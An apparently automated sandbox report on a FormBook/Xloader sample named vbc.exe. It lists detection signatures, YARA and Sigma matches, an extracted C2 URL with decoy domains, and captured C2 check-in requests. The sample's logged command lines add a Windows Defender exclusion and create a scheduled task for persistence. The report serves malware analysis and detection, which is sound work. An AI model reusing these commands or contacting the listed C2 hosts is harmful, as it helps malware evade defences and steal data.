Create Interactive Tour

Windows Analysis Report vbc.exe

Overview

General Information

Sample Name:vbc.exe
Analysis ID:518412
MD5:c4a1bdd685e346b7604f93357a922875
SHA1:6b8fccadcf1977f5850faa1c47617343fafc0ff4
SHA256:728b23f75c1140a1763dd7c75083f2ae57afeb6ffa3d7b33a9ba1b4904c4566d
Tags:exeXloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • vbc.exe (PID: 6420 cmdline: "C:\Users\user\Desktop\vbc.exe" MD5: C4A1BDD685E346B7604F93357A922875)
    • powershell.exe (PID: 6604 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6624 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vbc.exe (PID: 6824 cmdline: C:\Users\user\Desktop\vbc.exe MD5: C4A1BDD685E346B7604F93357A922875)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 6756 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
  • cleanup
{
  "C2 list": [
    "www.septemberstockevent200.com/ht08/"
  ],
  "decoy": [
    "joye.club",
    "istanbulemlakgalerisi.online",
    "annikadaniel.love",
    "oooci.com",
    "curebase-test.com",
    "swisstradecenter.com",
    "hacticum.com",
    "centercodebase.com",
    "recbi56ni.com",
    "mmj0115.xyz",
    "sharpstead.com",
    "sprklbeauty.com",
    "progettogenesi.cloud",
    "dolinum.com",
    "amaroqadvisors.com",
    "traininig.com",
    "leewaysvcs.com",
    "nashhomesearch.com",
    "joy1263.com",
    "serkanyamac.com",
    "nursingprogramsforme.com",
    "huakf.com",
    "1w3.online",
    "watermountsteam.top",
    "tyralruutan.quest",
    "mattlambert.xyz",
    "xn--fiqs8sypgfujbl4a.xn--czru2d",
    "hfgoal.com",
    "587868.net",
    "noyoucantridemyonewheel.com",
    "riewesell.top",
    "expn.asia",
    "suplementarsas.com",
    "item154655544.com",
    "cdgdentists.com",
    "deboraverdian.com",
    "franquiciasexclusivas.tienda",
    "tminus-10.com",
    "psychoterapeuta-wroclaw.com",
    "coachingbywatson.com",
    "lknitti.net",
    "belenpison.agency",
    "facilitetec.com",
    "99077000.com",
    "thefitmog.com",
    "kinmanpowerwashing.com",
    "escueladelbuenamor.com",
    "getjoyce.net",
    "oilelm.com",
    "maikoufarm.com",
    "hespresso.net",
    "timothyschmallrealt.com",
    "knoxvilleraingutters.com",
    "roonkingagency.online",
    "trashwasher.com",
    "angyfoods.com",
    "yungbredda.com",
    "digipoint-entertainment.com",
    "shangduli.space",
    "kalaraskincare.com",
    "ktnsound.xyz",
    "miabellavita.com",
    "thenlpmentor.com",
    "marzhukov.com"
  ]
}
SourceRuleDescriptionAuthorStrings
00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries
      SourceRuleDescriptionAuthorStrings
      8.0.vbc.exe.400000.6.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        8.0.vbc.exe.400000.6.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        8.0.vbc.exe.400000.6.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        8.0.vbc.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          8.0.vbc.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 23 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspicius Add Task From User AppData Temp
          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\vbc.exe" , ParentImage: C:\Users\user\Desktop\vbc.exe, ParentProcessId: 6420, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp, ProcessId: 6624
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vbc.exe" , ParentImage: C:\Users\user\Desktop\vbc.exe, ParentProcessId: 6420, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe, ProcessId: 6604
          Sigma detected: Non Interactive PowerShell
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vbc.exe" , ParentImage: C:\Users\user\Desktop\vbc.exe, ParentProcessId: 6420, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe, ProcessId: 6604
          Sigma detected: T1086 PowerShell Execution
          Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132809649656072936.6604.DefaultAppDomain.powershell

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configuration
          Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}
          Yara detected FormBook
          Source: Yara matchFile source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.joye.club/ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwHAvira URL Cloud: Label: phishing
          Source: http://www.mattlambert.xyz/ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwHAvira URL Cloud: Label: phishing
          Source: 8.0.vbc.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.0.vbc.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.0.vbc.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: vbc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: vbc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe
          Source: Binary string: help.pdbGCTL source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp
          Source: Binary string: help.pdb source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 44.227.65.245:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 44.227.65.245:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 44.227.65.245:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49816 -> 172.67.188.247:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49816 -> 172.67.188.247:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49816 -> 172.67.188.247:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49821 -> 101.132.116.91:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49821 -> 101.132.116.91:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49821 -> 101.132.116.91:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.miabellavita.com
          Source: C:\Windows\explorer.exeDomain query: www.joye.club
          Source: C:\Windows\explorer.exeDomain query: www.maikoufarm.com
          Source: C:\Windows\explorer.exeDomain query: www.mmj0115.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.65.245 80
          Source: C:\Windows\explorer.exeDomain query: www.septemberstockevent200.com
          Source: C:\Windows\explorer.exeDomain query: www.watermountsteam.top
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.4.114 80
          Source: C:\Windows\explorer.exeDomain query: www.yungbredda.com
          Source: C:\Windows\explorer.exeDomain query: www.leewaysvcs.com
          Source: C:\Windows\explorer.exeDomain query: www.sharpstead.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.122.222 80
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.188.247 80
          Source: C:\Windows\explorer.exeNetwork Connect: 101.132.116.91 80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.mmj0115.xyz
          Source: DNS query: www.mattlambert.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.septemberstockevent200.com/ht08/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.sharpstead.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.maikoufarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH HTTP/1.1Host: www.septemberstockevent200.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH HTTP/1.1Host: www.joye.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH HTTP/1.1Host: www.miabellavita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=h33IU5xP+CsHIX0jyOd12cEn3mj+DYpLQqBt2JgN37c56kNOSv5/h9LYm8RBo0LsRlylinxRVA==&IfNL=N8ph5BwH HTTP/1.1Host: www.yungbredda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH HTTP/1.1Host: www.mattlambert.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 44.227.65.245 44.227.65.245
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 09 Nov 2021 11:57:34 GMTContent-Type: text/htmlContent-Length: 275ETag: "6182ae77-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Nov 2021 11:57:40 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 74 30 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ht08/ was not found on this server.</p></body></html>
